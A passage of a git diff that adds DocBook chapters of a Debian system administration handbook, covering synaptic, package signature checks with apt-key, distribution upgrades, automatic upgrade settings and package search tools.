+    </section>
+    <section>
+      <title><command>synaptic</command></title>
+
+      <para><command>synaptic</command> is a graphical package manager for
+      Debian which features a clean and efficient graphical interface based
+      on GTK+/GNOME. Its many ready-to-use filters give fast access to
+      newly available packages, installed packages, upgradable packages,
+      obsolete packages and so on. If you browse through these lists, you
+      can select the operations to be done on the packages (install,
+      upgrade, remove, purge); these operations are not performed
+      immediately, but put into a task list. A single click on a button
+      then validates the operations, and they are performed in one
+      go.</para>
+
+      <figure>
+        <title><command>synaptic</command> package manager</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/synaptic.png" scalefit="1" width="75%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+    </section>
+  </section>
+  <section id="sect.package-authentication">
+    <title>Checking Package Authenticity</title>
+    <indexterm><primary>package</primary><secondary>authenticity check</secondary></indexterm>
+    <indexterm><primary>package</primary><secondary>seal</secondary></indexterm>
+    <indexterm><primary>package</primary><secondary>signature</secondary></indexterm>
+    <indexterm><primary>signature</primary><secondary>package signature</secondary></indexterm>
+    <indexterm><primary>authentication</primary><secondary>package authentication</secondary></indexterm>
+
+    <para>Security is very important for Falcot Corp administrators.
+    Accordingly, they need to ensure that they only install packages which
+    are guaranteed to come from Debian with no tampering on the way. A
+    computer cracker could try to add malicious code to an otherwise
+    legitimate package. Such a package, if installed, could do anything the
+    cracker designed it to do, including for instance disclosing passwords
+    or confidential information. To circumvent this risk, Debian provides a
+    tamper-proof seal to guarantee — at install time — that a package
+    really comes from its official maintainer and hasn't been modified by a
+    third party.</para>
+
+    <para>The seal works with a chain of cryptographical hashes and a
+    signature. The signed file is the <filename>Release</filename> file,
+    provided by the Debian mirrors. It contains a list of the
+    <filename>Packages</filename> files (including their compressed forms,
+    <filename>Packages.gz</filename> and <filename>Packages.xz</filename>,
+    and the incremental versions), along with their MD5, SHA1 and SHA256
+    hashes, which ensures that the files haven't been tampered with. These
+    <filename>Packages</filename> files contain a list of the Debian
+    packages available on the mirror, along with their hashes, which
+    ensures in turn that the contents of the packages themselves haven't
+    been altered either.</para>
+
+    <indexterm><primary><command>apt-key</command></primary></indexterm>
+    <indexterm><primary><emphasis role="pkg">debian-archive-keyring</emphasis></primary></indexterm>
+    <indexterm><primary><filename>/etc/apt/trusted.gpg.d/</filename></primary></indexterm>
+    <indexterm><primary><filename>Release.gpg</filename></primary></indexterm>
+    <para>
+      APT needs a set of trusted GnuPG public keys to verify signatures in
+      the <filename>Release.gpg</filename> files available on the mirrors.
+      It gets them from files in <filename>/etc/apt/trusted.gpg.d/</filename>
+      and from the <filename>/etc/apt/trusted.gpg</filename> keyring (managed
+      by the <command>apt-key</command> command). The official Debian keys
+      are provided and kept up-to-date by the <emphasis role="pkg">debian-archive-keyring</emphasis> package which puts
+      them in <filename>/etc/apt/trusted.gpg.d/</filename>.
+      Note however that the first installation of this particular package
+      requires caution: even if the package is signed like any other, the
+      signature cannot be verified externally. Cautious administrators should
+      therefore check the fingerprints of imported keys before trusting them
+      to install new packages:
+    </para>
+
+    <screen role="scale"># <userinput>apt-key fingerprint</userinput>
+/etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg
+----------------------------------------------------------
+pub   rsa4096 2014-11-21 [SC] [expires: 2022-11-19]
+      126C 0D24 BD8A 2942 CC7D  F8AC 7638 D044 2B90 D010
+uid           [ unknown] Debian Archive Automatic Signing Key (8/jessie) &lt;ftpmaster@debian.org&gt;
+
+/etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg
+-------------------------------------------------------------------
+pub   rsa4096 2014-11-21 [SC] [expires: 2022-11-19]
+      D211 6914 1CEC D440 F2EB  8DDA 9D6D 8F6B C857 C906
+uid           [ unknown] Debian Security Archive Automatic Signing Key (8/jessie) &lt;ftpmaster@debian.org&gt;
+
+/etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg
+-------------------------------------------------------
+pub   rsa4096 2013-08-17 [SC] [expires: 2021-08-15]
+      75DD C3C4 A499 F1A1 8CB5  F3C8 CBF8 D6FD 518E 17E1
+uid           [ unknown] Jessie Stable Release Key &lt;debian-release@lists.debian.org&gt;
+
+/etc/apt/trusted.gpg.d/debian-archive-stretch-automatic.gpg
+-----------------------------------------------------------
+pub   rsa4096 2017-05-22 [SC] [expires: 2025-05-20]
+      E1CF 20DD FFE4 B89E 8026  58F1 E0B1 1894 F66A EC98
+uid           [ unknown] Debian Archive Automatic Signing Key (9/stretch) &lt;ftpmaster@debian.org&gt;
+sub   rsa4096 2017-05-22 [S] [expires: 2025-05-20]
+
+/etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg
+--------------------------------------------------------------------
+pub   rsa4096 2017-05-22 [SC] [expires: 2025-05-20]
+      6ED6 F5CB 5FA6 FB2F 460A  E88E EDA0 D238 8AE2 2BA9
+uid           [ unknown] Debian Security Archive Automatic Signing Key (9/stretch) &lt;ftpmaster@debian.org&gt;
+sub   rsa4096 2017-05-22 [S] [expires: 2025-05-20]
+
+/etc/apt/trusted.gpg.d/debian-archive-stretch-stable.gpg
+--------------------------------------------------------
+pub   rsa4096 2017-05-20 [SC] [expires: 2025-05-18]
+      067E 3C45 6BAE 240A CEE8  8F6F EF0F 382A 1A7B 6500
+uid           [ unknown] Debian Stable Release Key (9/stretch) &lt;debian-release@lists.debian.org&gt;
+
+/etc/apt/trusted.gpg.d/debian-archive-wheezy-automatic.gpg
+----------------------------------------------------------
+pub   rsa4096 2012-04-27 [SC] [expires: 2020-04-25]
+      A1BD 8E9D 78F7 FE5C 3E65  D8AF 8B48 AD62 4692 5553
+uid           [ unknown] Debian Archive Automatic Signing Key (7.0/wheezy) &lt;ftpmaster@debian.org&gt;
+
+/etc/apt/trusted.gpg.d/debian-archive-wheezy-stable.gpg
+-------------------------------------------------------
+pub   rsa4096 2012-05-08 [SC] [expires: 2019-05-07]
+      ED6D 6527 1AAC F0FF 15D1  2303 6FB2 A1C2 65FF B764
+uid           [ unknown] Wheezy Stable Release Key &lt;debian-release@lists.debian.org&gt;
+</screen>
+
+    <sidebar>
+      <title><emphasis>IN PRACTICE</emphasis> Adding trusted keys</title>
+      <indexterm><primary>trusted key</primary></indexterm>
+      <indexterm><primary>key</primary><secondary>APT's authentication keys</secondary></indexterm>
+
+      <para>When a third-party package source is added to the
+      <filename>sources.list</filename> file, APT needs to be told to trust
+      the corresponding GPG authentication key (otherwise it will keep complaining
+      that it can't ensure the authenticity of the packages coming from
+      that repository). The first step is of course to get the public key.
+      More often than not, the key will be provided as a small text file,
+      which we will call <filename>key.asc</filename> in the following
+      examples.</para>
+
+      <para>
+        To add the key to the trusted keyring, the administrator can
+        just put it in a <filename>*.asc</filename> file in
+        <filename>/etc/apt/trusted.gpg.d/</filename>. This is supported
+        since Debian <emphasis role="distribution">Stretch</emphasis>. With
+        older releases, you had to run <command>apt-key add &lt; key.asc</command>.
+      </para>
+
+      <indexterm><primary><emphasis role="pkg">gui-apt-key</emphasis></primary></indexterm>
+      <para>For people who would want a dedicated application and more
+      details on the trusted keys, it is possible to use
+      <command>gui-apt-key</command> (in the package of the same name), a
+      small graphical user interface which manages the trusted keyring.
+      </para>
+    </sidebar>
+
+    <para>Once the appropriate keys are in the keyring, APT will check the
+    signatures before any risky operation, so that front-ends will display
+    a warning if asked to install a package whose authenticity can't be
+    ascertained.</para>
+  </section>
+  <section id="sect.dist-upgrade">
+    <title>Upgrading from One Stable Distribution to the Next</title>
+
+    <para>One of the best-known features of Debian is its ability to
+    upgrade an installed system from one stable release to the next:
+    <foreignphrase>dist-upgrade</foreignphrase> — a well-known phrase —
+    has largely contributed to the project's reputation. With a few
+    precautions, upgrading a computer can take as little as a few minutes,
+    or a few dozen minutes, depending on the download speed from the package
+    repositories.</para>
+    <section>
+      <title>Recommended Procedure</title>
+
+      <para>Since Debian has quite some time to evolve in-between stable
+      releases, you should read the release notes before upgrading.</para>
+
+      <sidebar>
+        <title><emphasis>BACK TO BASICS</emphasis> Release notes</title>
+
+	<para>The release notes for an operating system (and, more
+	generally, for any software) are a document giving an overview of
+	the software, with some details concerning the particularities of
+	one version. These documents are generally short compared to the
+	complete documentation, and they usually list the features which
+	have been introduced since the previous version. They also give
+	details on upgrading procedures, warnings for users of previous
+	versions, and sometimes errata.</para>
+
+	
+	<para>Release notes are available online: the release notes for the
+	current stable release have a dedicated URL, while older release
+	notes can be found with their codenames:
+	<ulink type="block" url="http://www.debian.org/releases/stable/releasenotes" />
+	<ulink type="block" url="http://www.debian.org/releases/jessie/releasenotes" /></para>
+      </sidebar>
+
+      
+      <para>In this section, we will focus on upgrading a <emphasis role="distribution">Jessie</emphasis> system to <emphasis role="distribution">Stretch</emphasis>. This is a major operation on
+      a system; as such, it is never 100% risk-free, and should not be
+      attempted before all important data has been backed up.</para>
+
+      <para>Another good habit which makes the upgrade easier (and
+      shorter) is to tidy your installed packages and keep only the ones
+      that are really needed. Helpful tools to do that include
+      <command>aptitude</command>, <command>deborphan</command> and
+      <command>debfoster</command> (see <xref linkend="sect.automatic-tracking" />). For example, you can use the
+      following command, and then use <command>aptitude</command>'s interactive
+      mode to double check and fine-tune the scheduled removals:</para>
+
+      <screen># <userinput>deborphan | xargs aptitude --schedule-only remove</userinput>
+</screen>
+
+      <para>Now for the upgrading itself. First, you need to change the
+      <filename>/etc/apt/sources.list</filename> file to tell APT to get
+      its packages from <emphasis role="distribution">Stretch</emphasis>
+      instead of <emphasis role="distribution">Jessie</emphasis>. If the
+      file only contains references to <emphasis role="distribution">Stable</emphasis> rather than explicit codenames,
+      the change isn't even required, since <emphasis role="distribution">Stable</emphasis> always refers to the latest
+      released version of Debian. In both cases, the database of available
+      packages must be refreshed (with the <command>apt
+      update</command> command or the refresh button in
+      <command>synaptic</command>).</para>
+
+      <para>Once these new package sources are registered, you should
+      first do a minimal upgrade with <command>apt upgrade</command>.
+      By doing the upgrade in two steps, we ease the job of the
+      package management tools and often ensure that we have the latest
+      versions of those, which might have accumulated bugfixes and
+      improvements required to complete the full distribution upgrade.
+      </para>
+
+      <para>Once this first upgrade is done, it is time to handle the
+      upgrade itself, either with <command>apt full-upgrade</command>,
+      <command>aptitude</command>, or
+      <command>synaptic</command>. You should carefully check the suggested
+      actions before applying them: you might want to add suggested
+      packages or deselect packages which are only recommended and known
+      not to be useful. In any case, the front-end should come up with a
+      scenario ending in a coherent and up-to-date <emphasis role="distribution">Stretch</emphasis> system. Then, all you need is
+      to do is wait while the required packages are downloaded, answer the
+      Debconf questions and possibly those about locally modified
+      configuration files, and sit back while APT does its magic.</para>
+    </section>
+    <section>
+      <title>Handling Problems after an Upgrade</title>
+
+      <para>In spite of the Debian maintainers' best efforts, a major
+      system upgrade isn't always as smooth as you could wish. New software
+      versions may be incompatible with previous ones (for instance, their
+      default behavior or their data format may have changed). Also, some
+      bugs may slip through the cracks despite the testing phase which
+      always precedes a Debian release.</para>
+
+      <para>To anticipate some of these problems, you can install the
+      <emphasis role="pkg">apt-listchanges</emphasis> package, which
+      displays information about possible problems at the beginning of a
+      package upgrade. This information is compiled by the package
+      maintainers and put in
+      <filename>/usr/share/doc/<replaceable>package</replaceable>/NEWS.Debian</filename>
+      files for the benefit of users. Reading these files (possibly through
+      <emphasis role="pkg">apt-listchanges</emphasis>) should help you
+      avoid bad surprises.</para>
+
+      <para>You might sometimes find that the new version of a software
+      doesn't work at all. This generally happens if the application isn't
+      particularly popular and hasn't been tested enough; a last-minute
+      update can also introduce regressions which are only found after the
+      stable release. In both cases, the first thing to do is to have a
+      look at the bug tracking system at
+      <literal>https://bugs.debian.org/<replaceable>package</replaceable></literal>,
+      and check whether the problem has already been reported. If it
+      hasn't, you should report it yourself with
+      <command>reportbug</command>. If it is already known, the bug report
+      and the associated messages are usually an excellent source of
+      information related to the bug:</para>
+      <itemizedlist>
+        <listitem>
+	  <para>sometimes a patch already exists, and it is available on
+	  the bug report; you can then recompile a fixed version of the
+	  broken package locally (see <xref linkend="sect.rebuilding-package" />);</para>
+        </listitem>
+        <listitem>
+	  <para>in other cases, users may have found a workaround for the
+	  problem and shared their insights about it in their replies to
+	  the report;</para>
+        </listitem>
+        <listitem>
+	  <para>in yet other cases, a fixed package may have already been
+	  prepared and made public by the maintainer.</para>
+        </listitem>
+      </itemizedlist>
+
+      <para>Depending on the severity of the bug, a new version of the
+      package may be prepared specifically for a new revision of the stable
+      release. When this happens, the fixed package is made available in
+      the <literal>proposed-updates</literal> section of the Debian mirrors
+      (see <xref linkend="sect.proposed-updates" />). The corresponding
+      entry can then be temporarily added to the
+      <filename>sources.list</filename> file, and updated packages can be
+      installed with <command>apt</command> or
+      <command>aptitude</command>.</para>
+
+      <para>Sometimes the fixed package isn't available in this section yet
+      because it is pending a validation by the Stable Release Managers.
+      You can verify if that's the case on their web page. Packages listed
+      there aren't available yet, but at least you know that the
+      publication process is ongoing. <ulink type="block" url="https://release.debian.org/proposed-updates/stable.html" /></para>
+    </section>
+  </section>
+  <section id="sect.regular-upgrades">
+    <title>Keeping a System Up to Date</title>
+
+    <para>The Debian distribution is dynamic and changes continually. Most
+    of the changes are in the <emphasis role="distribution">Testing</emphasis> and <emphasis role="distribution">Unstable</emphasis> versions, but even <emphasis role="distribution">Stable</emphasis> is updated from time to time,
+    mostly for security-related fixes. Whatever version of Debian a system
+    runs, it is generally a good idea to keep it up to date, so that you
+    can get the benefit of recent evolutions and bug fixes.</para>
+
+    <para>While it is of course possible to periodically run a tool to
+    check for available updates and run the upgrades, such a repetitive
+    task is tedious, especially when it needs to be performed on several
+    machines. Fortunately, like many repetitive tasks, it can be partly
+    automated, and a set of tools have already been developed to that
+    effect.</para>
+
+    <para>The first of these tools is <command>apticron</command>, in the
+    package of the same name. Its main effect is to run a script daily (via
+    <command>cron</command>). The script updates the list of available
+    packages, and, if some installed packages are not in the latest
+    available version, it sends an email with a list of these packages
+    along with the changes that have been made in the new versions.
+    Obviously, this package mostly targets users of Debian <emphasis role="distribution">Stable</emphasis>, since the daily emails would be
+    very long for the faster paced versions of Debian. When updates are
+    available, <command>apticron</command> automatically downloads them. It
+    does not install them — the administrator will still do it — but
+    having the packages already downloaded and available locally (in APT's
+    cache) makes the job faster.</para>
+
+    <para>Administrators in charge of several computers will no doubt
+    appreciate being informed of pending upgrades, but the upgrades
+    themselves are still as tedious as they used to be. Periodic upgrades can
+    be enabled: it uses a <command>systemd</command> timer unit or
+    <command>cron</command>.
+    If <emphasis role="pkg">systemd</emphasis> is not installed the
+    <filename>/etc/cron.daily/apt-compat</filename> script (in the <emphasis role="pkg">apt</emphasis> package) comes in handy. This script is
+    run daily (and non-interactively) by <command>cron</command>.
+    To control the behavior, use APT configuration variables (which are
+    therefore stored in a file
+    <filename>/etc/apt/apt.conf.d/10periodic</filename>). The main variables
+    are:</para>
+    <variablelist>
+      <varlistentry>
+        <term>
+          <literal>APT::Periodic::Update-Package-Lists</literal>
+        </term>
+        <listitem>
+	  <para>This option allows you to specify the frequency (in days)
+	  at which the package lists are refreshed.
+	  <command>apticron</command> users can do without this variable,
+	  since <command>apticron</command> already does this task.</para>
+        </listitem>
+      </varlistentry>
+      <varlistentry>
+        <term>
+          <literal>APT::Periodic::Download-Upgradeable-Packages</literal>
+        </term>
+        <listitem>
+	  <para>Again, this option indicates a frequency (in days), this
+	  time for the downloading of the actual packages. Again,
+	  <command>apticron</command> users won't need it.</para>
+        </listitem>
+      </varlistentry>
+      <varlistentry>
+        <term>
+          <literal>APT::Periodic::AutocleanInterval</literal>
+        </term>
+        <listitem>
+	  <para>This option covers a feature that
+	  <command>apticron</command> doesn't have. It controls how often
+	  obsolete packages (those not referenced by any distribution
+	  anymore) are removed from the APT cache. This keeps the APT cache
+	  at a reasonable size and means that you don't need to worry about
+	  that task.</para>
+        </listitem>
+      </varlistentry>
+      <varlistentry>
+        <term>
+          <literal>APT::Periodic::Unattended-Upgrade</literal>
+        </term>
+        <listitem>
+	  <indexterm><primary><emphasis role="pkg">unattended-upgrades</emphasis></primary></indexterm>
+	  <para>When this option is enabled, the daily script will
+	  execute <command>unattended-upgrade</command> (from the
+	  <emphasis role="pkg">unattended-upgrades</emphasis> package)
+	  which — as its name suggest — can automatize the upgrade
+	  process for some packages (by default it only takes care of
+	  security updates, but this can be customized in
+	  <filename>/etc/apt/apt.conf.d/50unattended-upgrades</filename>).
+	  Note that this option can be set with the help of debconf
+	  by running <command>dpkg-reconfigure -plow unattended-upgrades</command>.
+	  </para>
+        </listitem>
+      </varlistentry>
+
+    </variablelist>
+
+    <para>Other options can allow you to control the cache cleaning
+    behavior with more precision. They are not listed here, but they are
+    described in the <filename>/usr/lib/apt/apt.systemd.daily</filename>
+    script.</para>
+
+    <indexterm><primary><emphasis role="pkg">gnome-packagekit</emphasis></primary></indexterm>
+    <para>These tools work very well for servers, but desktop users
+    generally prefer a more interactive system. The package <emphasis role="pkg">gnome-packagekit</emphasis> provides an icon in the
+    notification area of desktop environments when updates are available;
+    clicking on this icon then runs <command>gpk-update-viewer</command>,
+    a simplified interface to perform updates. You can browse through
+    available updates, read the short description of the relevant packages
+    and the corresponding <filename>changelog</filename> entries, and
+    select whether to apply the update or not on a case-by-case
+    basis.</para>
+
+    <figure>
+      <title>Upgrading with <command>gpk-update-viewer</command></title>
+      <mediaobject>
+        <imageobject>
+          <imagedata fileref="images/gnome-packagekit.png" scalefit="1" width="70%" />
+        </imageobject>
+      </mediaobject>
+    </figure>
+
+    <para>
+      This tool is no longer installed in the default GNOME desktop. The
+      new philosophy is that security updates should be automatically
+      installed, either in the background or, preferably, when you
+      shutdown your computer so as to not confuse any running application.
+    </para>
+  </section>
+
+  <section id="sect.automatic-upgrades">
+    <title>Automatic Upgrades</title>
+    <indexterm><primary>upgrade</primary><secondary>automatic system upgrade</secondary></indexterm>
+    <indexterm><primary>automatic upgrade</primary></indexterm>
+
+    <para>Since Falcot Corp has many computers but only limited manpower,
+    its administrators try to make upgrades as automatic as possible. The
+    programs in charge of these processes must therefore run with no human
+    intervention.</para>
+    <section>
+      <title>Configuring <command>dpkg</command></title>
+
+      <para>As we have already mentioned (see sidebar <xref linkend="sidebar.questions-conffiles" />), <command>dpkg</command> can
+      be instructed not to ask for confirmation when replacing a
+      configuration file (with the <literal>--force-confdef
+      --force-confold</literal> options). Interactions can, however, have
+      three other sources: some come from APT itself, some are handled by
+      <command>debconf</command>, and some happen on the command line due
+      to package configuration scripts.</para>
+    </section>
+    <section>
+      <title>Configuring APT</title>
+
+      <para>The case of APT is simple: the <literal>-y</literal> option (or
+      <literal>--assume-yes</literal>) tells APT to consider the answer to
+      all its questions to be “yes”.</para>
+    </section>
+    <section>
+      <title>Configuring <command>debconf</command></title>
+
+      <para>The case of <command>debconf</command> deserves more details.
+      This program was, from its inception, designed to control the
+      relevance and volume of questions displayed to the user, as well as
+      the way they are shown. That is why its configuration requests a
+      minimal priority for questions; only questions above the minimal
+      priority are displayed. <command>debconf</command> assumes the
+      default answer (defined by the package maintainer) for questions
+      which it decided to skip.</para>
+
+      <para>The other relevant configuration element is the interface used
+      by the front-end. If you choose <literal>noninteractive</literal> out
+      of the choices, all user interaction is disabled. If a package tries
+      to display an informative note, it will be sent to the administrator
+      by email.</para>
+
+      <para>To reconfigure <command>debconf</command>, use the
+      <command>dpkg-reconfigure</command> tool from the <emphasis role="pkg">debconf</emphasis> package; the relevant command is
+      <command>dpkg-reconfigure debconf</command>. Note that the configured
+      values can be temporarily overridden with environment variables when
+      needed (for instance, <varname>DEBIAN_FRONTEND</varname> controls the
+      interface, as documented in the
+      <citerefentry><refentrytitle>debconf</refentrytitle><manvolnum>7</manvolnum></citerefentry>
+      manual page).</para>
+    </section>
+    <section>
+      <title>Handling Command Line Interactions</title>
+
+      <para>The last source of interactions, and the hardest to get rid of,
+      is the configuration scripts run by <command>dpkg</command>. There is
+      unfortunately no standard solution, and no answer is overwhelmingly
+      better than another.</para>
+
+      <para>The common approach is to suppress the standard input by
+      redirecting the empty content of <filename>/dev/null</filename> into
+      it with <command><replaceable>command</replaceable>
+      &lt;/dev/null</command>, or to feed it with an endless stream of
+      newlines. None of these methods is 100 % reliable, but they
+      generally lead to the default answers being used, since most scripts
+      consider a lack of reply as an acceptance of the default
+      value.</para>
+    </section>
+    <section>
+      <title>The Miracle Combination</title>
+
+      <para>By combining the previous elements, it is possible to design a
+      small but rather reliable script which can handle automatic
+      upgrades.</para>
+
+      <example id="example.non-interactive-upgrade">
+        <title>Non-interactive upgrade script</title>
+
+        <programlisting>export DEBIAN_FRONTEND=noninteractive
+yes '' | apt-get -y -o DPkg::options::="--force-confdef" -o DPkg::options::="--force-confold" dist-upgrade
+</programlisting>
+      </example>
+
+      <sidebar>
+        <title><emphasis>IN PRACTICE</emphasis> The Falcot Corp case</title>
+
+	<para>Falcot computers are a heterogeneous system, with machines
+	having various functions. Administrators will therefore pick the
+	most relevant solution for each computer.</para>
+
+	<para>In practice, the servers running <emphasis role="distribution">Stretch</emphasis> are configured with the
+	“miracle combination” above, and are kept up to date
+	automatically. Only the most critical servers (the firewalls, for
+	instances) are set up with <command>apticron</command>, so that
+	upgrades always happen under the supervision of an
+	administrator.</para>
+
+	<para>The office workstations in the administrative services also
+	run <emphasis role="distribution">Stretch</emphasis>, but they are
+	equipped with <emphasis role="pkg">gnome-packagekit</emphasis>,
+	so that users trigger the upgrades themselves. The
+	rationale for this decision is that if upgrades happen without an
+	explicit action, the behavior of the computer might change
+	unexpectedly, which could cause confusion for the main
+	users.</para>
+
+	<para>In the lab, the few computers using <emphasis role="distribution">Testing</emphasis> — to take advantage of the
+	latest software versions — are not upgraded automatically either.
+	Administrators only configure APT to prepare the upgrades but not
+	enact them; when they decide to upgrade (manually), the tedious
+	parts of refreshing package lists and downloading packages will be
+	avoided, and administrators can focus on the really useful
+	part.</para>
+      </sidebar>
+    </section>
+  </section>
+  <section id="sect.searching-packages">
+    <title>Searching for Packages</title>
+
+    <para>With the large and ever-growing amount of software in Debian,
+    there emerges a paradox: Debian usually has a tool for most tasks, but
+    that tool can be very difficult to find amongst the myriad other
+    packages. The lack of appropriate ways to search for (and to find) the
+    right tool has long been a problem. Fortunately, this problem has
+    almost entirely been solved.</para>
+
+    <para>The most trivial search possible is looking up an exact package
+    name. If <command>apt show
+    <replaceable>package</replaceable></command> returns a result, then the
+    package exists. Unfortunately, this requires knowing or even guessing
+    the package name, which isn't always possible.</para>
+
+    <sidebar>
+      <title><emphasis>TIP</emphasis> Package naming conventions</title>
+
+      <para>Some categories of packages are named according to a
+      conventional naming scheme; knowing the scheme can sometimes allow
+      you to guess exact package names. For instance, for Perl modules, the
+      convention says that a module called
+      <literal>XML::Handler::Composer</literal> upstream should be packaged
+      as <emphasis role="pkg">libxml-handler-composer-perl</emphasis>. The
+      library enabling the use of the <command>gconf</command> system from
+      Python is packaged as <emphasis role="pkg">python-gconf</emphasis>.
+      It is unfortunately not possible to define a fully general naming
+      scheme for all packages, even though package maintainers usually try
+      to follow the choice of the upstream developers.</para>
+    </sidebar>
+
+    <para>A slightly more successful searching pattern is a plain-text
+    search in package names, but it remains very limited. You can generally
+    find results by searching package descriptions: since each package has
+    a more or less detailed description in addition to its package name, a
+    keyword search in these descriptions will often be useful.
+    <command>apt-cache</command> and <command>axi-cache</command> are the
+    tools of choice for this kind of
+    search; for instance, <command>apt-cache search video</command> will
+    return a list of all packages whose name or description contains the
+    keyword “video”.</para>
+
+    <para>For more complex searches, a more powerful tool such as
+    <command>aptitude</command> is required. <command>aptitude</command>
+    allows you to search according to a logical expression based on the
+    package's meta-data fields. For instance, the following command
+    searches for packages whose name contains <literal>kino</literal>,
+    whose description contains <literal>video</literal> and whose
+    maintainer's name contains <literal>paul</literal>:</para>
+
+    <screen>$ <userinput>aptitude search kino~dvideo~mpaul</userinput>
+p   kino  - Non-linear editor for Digital Video data
+$ <userinput>aptitude show kino</userinput>
+Package: kino
+Version: 1.3.4-2.2+b2
+State: not installed
+Priority: extra
+Section: video
+Maintainer: Paul Brossier &lt;piem@debian.org&gt;
+Architecture: amd64
+Uncompressed Size: 8300 k
+Depends: libasound2 (&gt;= 1.0.16), libatk1.0-0 (&gt;= 1.12.4), libavc1394-0
+         (&gt;= 0.5.3), libavcodec57 (&gt;= 7:3.2.4) | libavcodec-extra57 (&gt;=
+         7:3.2.4), libavformat57 (&gt;= 7:3.2.4), libavutil55 (&gt;= 7:3.2.4), libc6
+         (&gt;= 2.14), libcairo2 (&gt;= 1.2.4), libdv4 (&gt;= 1.0.0), libfontconfig1
+         (&gt;= 2.11), libfreetype6 (&gt;= 2.2.1), libgcc1 (&gt;= 1:3.0),
+         libgdk-pixbuf2.0-0 (&gt;= 2.22.0), libglade2-0 (&gt;= 1:2.6.4-2~), libglib2.0-0
+         (&gt;= 2.16.0), libgtk2.0-0 (&gt;= 2.24.0), libice6 (&gt;= 1:1.0.0),
+         libiec61883-0 (&gt;= 1.2.0), libpango-1.0-0 (&gt;= 1.14.0), libpangocairo-1.0-0
+         (&gt;= 1.14.0), libpangoft2-1.0-0 (&gt;= 1.14.0), libquicktime2 (&gt;=
+         2:1.2.2), libraw1394-11, libsamplerate0 (&gt;= 0.1.7), libsm6, libstdc++6
+         (&gt;= 5.2), libswscale4 (&gt;= 7:3.2.4), libx11-6, libxext6, libxml2 (&gt;=
+         2.7.4), libxv1, zlib1g (&gt;= 1:1.1.4)
+Recommends: ffmpeg, curl
+Suggests: udev | hotplug, vorbis-tools, sox, mjpegtools, lame, ffmpeg2theora
+Conflicts: kino-dvtitler, kino-timfx, kinoplus, kino-dvtitler:i386, kino-timfx:i386,
+           kinoplus:i386, kino:i386
+Replaces: kino-dvtitler, kino-timfx, kinoplus, kino-dvtitler:i386, kino-timfx:i386,
+          kinoplus:i386
+Provides: kino-dvtitler, kino-timfx, kinoplus
+Description: Non-linear editor for Digital Video data
+ Kino allows you to record, create, edit, and play movies recorded with DV camcorders.
+ This program uses many keyboard commands for fast navigating and editing inside the
+ movie.
+ 
+ The kino-timfx, kino-dvtitler and kinoplus sets of plugins, formerly distributed as
+ separate packages, are now provided with Kino.
+Homepage: http://www.kinodv.org/
+Tags: field::arts, hardware::camera, implemented-in::c, implemented-in::c++,
+      interface::graphical, interface::x11, role::program, scope::application,
+      suite::gnome, uitoolkit::gtk, use::editing, use::learning,
+      works-with::video, x11::application
+</screen>
+
+    <para>The search only returns one package, <emphasis role="pkg">kino</emphasis>, which satisfies all three criteria.</para>
+
+    <para>Even these multi-criteria searches are rather unwieldy, which
+    explains why they are not used as much as they could. A new tagging
+    system has therefore been developed, and it provides a new approach to
+    searching. Packages are given tags that provide a thematical
+    classification along several strands, known as a “facet-based
+    classification”. In the case of <emphasis role="pkg">kino</emphasis>
+    above, the package's tags indicate that Kino is a Gnome-based software
+    that works on video data and whose main purpose is editing.</para>
+
+    <para>Browsing this classification can help you to search for a package
+    which corresponds to known needs; even if it returns a (moderate)
+    number of hits, the rest of the search can be done manually. To do
+    that, you can use the <literal>~G</literal> search pattern in
+    <command>aptitude</command>, but it is probably easier to simply
+    navigate the site where tags are managed:
+    <ulink type="block" url="https://debtags.debian.org/" />
+    </para>
+
+    <indexterm><primary><emphasis role="pkg">debtags</emphasis></primary></indexterm>
+    <indexterm><primary>tag</primary></indexterm>
+    <para>Selecting the <literal>works-with::video</literal> and
+    <literal>use::editing</literal> tags yields a handful of packages,
+    including the <emphasis role="pkg">kino</emphasis> and <emphasis role="pkg">pitivi</emphasis> video editors. This system of
+    classification is bound to be used more and more as time goes on, and
+    package managers will gradually provide efficient search interfaces
+    based on it.</para>
+
+    <para>To sum up, the best tool for the job depends on the complexity of
+    the search that you wish to do:</para>
+    <itemizedlist>
+      <listitem>
+	<para><command>apt-cache</command> only allows searching in package
+	names and descriptions, which is very convenient when looking for a
+	particular package that matches a few target keywords;</para>
+      </listitem>
+      <listitem>
+	<para>when the search criteria also include relationships between
+	packages or other meta-data such as the name of the maintainer,
+	<command>synaptic</command> will be more useful;</para>
+      </listitem>
+      <listitem>
+	<para>when a tag-based search is needed, a good tool is
+	<command>packagesearch</command>, a graphical interface dedicated
+	to searching available packages along several criteria (including
+	the names of the files that they contain). For usage on the
+	command-line, <command>axi-cache</command> will fit the bill.</para>
+        <indexterm><primary><emphasis role="pkg">packagesearch</emphasis></primary></indexterm>
+	<indexterm><primary><command>axi-cache</command></primary></indexterm>
+      </listitem>
+      <listitem>
+	<para>finally, when the searches involve complex expressions with
+	logic operations, the tool of choice will be
+	<command>aptitude</command>'s search pattern syntax, which is quite
+	powerful despite being somewhat obscure; it works in both the
+	command-line and the interactive modes.</para>
+      </listitem>
+    </itemizedlist>
+  </section>
+</chapter>
diff --git a/tmp/cs-CZ/xml_tmp/07_solving-problems.xml b/tmp/cs-CZ/xml_tmp/07_solving-problems.xml
new file mode 100644
index 000000000..ef32afdf1
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/07_solving-problems.xml
@@ -0,0 +1,633 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="solving-problems">
+  <chapterinfo>
+    <mediaobject condition="pdf">
+      <imageobject>
+        <imagedata fileref="images/chap-solving-problems.png" scalefit="1" />
+      </imageobject>
+    </mediaobject>
+    <keywordset>
+      <keyword>Documentation</keyword>
+      <keyword>Solving problems</keyword>
+      <keyword>Log files</keyword>
+      <keyword>README.Debian</keyword>
+      <keyword>Manual</keyword>
+      <keyword>info</keyword>
+    </keywordset>
+  </chapterinfo>
+  <title>Solving Problems and Finding Relevant Information</title>
+  <highlights>
+    <para>For an administrator, the most important skill is to be able to
